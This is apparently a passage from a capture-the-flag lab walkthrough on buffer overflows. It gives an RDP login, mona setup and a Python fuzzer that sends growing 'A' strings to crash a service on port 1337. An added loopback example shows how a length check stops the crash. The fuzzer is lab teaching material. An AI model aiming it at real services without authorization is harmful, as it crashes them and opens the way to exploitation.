2. Fuzzing
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.213.94
Once we find a vulnerable part with Spiking, we are going to use fuzzing. Fuzzing is to send a bunch of characters to the program to see if we can break it.
On your Kali box, connect to port 1337 on MACHINE_IP using netcat:
nc MACHINE_IP 1337
Mona Configuration
The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run in the command input box at the bottom of the Immunity Debugger window:
!mona config -set workingfolder c:\mona\%p
fuzzer.py
import socket, time, sys

ip = "MACHINE_IP"
port = 1337
timeout = 5

# Build 30 payloads of increasing length: 100, 200, ... 3000 bytes of "A".
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append(b"A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # read the banner before sending the command
        print("Fuzzing with %s bytes" % len(string))
        s.send(b"OVERFLOW1 " + string + b"\r\n")  # bytes, not str, so this runs under Python 3
        s.recv(1024)
        s.close()
    except (socket.error, socket.timeout):
        # A refused or timed-out connection means the server has stopped responding.
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
Run the fuzzer.py script using python: python fuzzer.py
The fuzzer sends increasingly long strings of As (100 bytes at a time, up to 3000). If one of the strings crashes the server, you should see an error like "Could not connect to MACHINE_IP:1337". Make a note of the largest number of bytes that were sent, i.e. the last "Fuzzing with ... bytes" line printed before the error.
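The exchange the fuzzer drives can be watched locally without the vulnerable VM. The following added example (not part of the original room or its fuzzer.py) starts a small stand-in server on loopback that speaks the same "OVERFLOW1 <payload>\r\n" protocol but enforces a line-length bound before it parses anything, runs the same 100..3000-byte sweep against it, and includes a helper that pulls the "largest number of bytes sent" out of fuzzer.py's own output. The MAX_LINE value, the banner text and the OK/ERR replies are constructed assumptions, not behaviour of the real target.

```python
import re
import socket
import threading

# Constructed bound for the hardened parser (assumption, not from the page):
# a line longer than this is refused before it is copied anywhere.
MAX_LINE = 2048
COMMAND = b"OVERFLOW1 "


def handle_command(line: bytes) -> bytes:
    """Length-check first, parse second: this is the check the vulnerable service lacks."""
    if len(line) > MAX_LINE:
        return b"ERR line too long\r\n"
    if not line.startswith(COMMAND):
        return b"ERR unknown command\r\n"
    payload = line[len(COMMAND):]
    return b"OK %d bytes\r\n" % len(payload)


def _serve(listener: socket.socket, connections: int) -> None:
    """Accept a fixed number of connections, answering each with handle_command."""
    for _ in range(connections):
        conn, _addr = listener.accept()
        with conn:
            conn.sendall(b"Welcome\r\n")  # banner that the fuzzer's first recv() consumes
            data = b""
            while not data.endswith(b"\r\n"):
                chunk = conn.recv(4096)
                if not chunk:
                    break
                data += chunk
            conn.sendall(handle_command(data.rstrip(b"\r\n")))


def start_server(host: str = "127.0.0.1", connections: int = 30) -> tuple:
    """Bind to a free loopback port and serve in a background thread; returns (listener, port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, 0))  # port 0: the OS picks a free port
    listener.listen(connections)
    thread = threading.Thread(target=_serve, args=(listener, connections), daemon=True)
    thread.start()
    return listener, listener.getsockname()[1]


def fuzz(host: str, port: int, lengths) -> list:
    """Send 'OVERFLOW1 ' + 'A' * n for each n, the way fuzzer.py does, and record the verdict."""
    results = []
    for n in lengths:
        with socket.create_connection((host, port), timeout=5) as s:
            s.recv(1024)  # banner
            s.sendall(COMMAND + b"A" * n + b"\r\n")
            results.append((n, s.recv(1024).rstrip(b"\r\n").decode()))
    return results


LOG_RE = re.compile(r"Fuzzing with (\d+) bytes")


def last_length_sent(log_lines):
    """From fuzzer.py's printed output, return the byte count of the last string sent
    before 'Could not connect' appeared, or None if the run never failed."""
    last = None
    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            last = int(m.group(1))
        elif line.startswith("Could not connect"):
            return last
    return None


if __name__ == "__main__":
    lengths = range(100, 3100, 100)  # the same 30 payload sizes fuzzer.py uses
    listener, port = start_server(connections=len(lengths))
    for n, verdict in fuzz("127.0.0.1", port, lengths):
        print(f"{n:5d} bytes -> {verdict}")
    listener.close()
```

Against the bounded parser the sweep never stops early: every payload over the limit is answered with an error and the connection stays usable, which is exactly the behaviour a length check buys you and the behaviour whose absence the "Could not connect" message reveals on the real target.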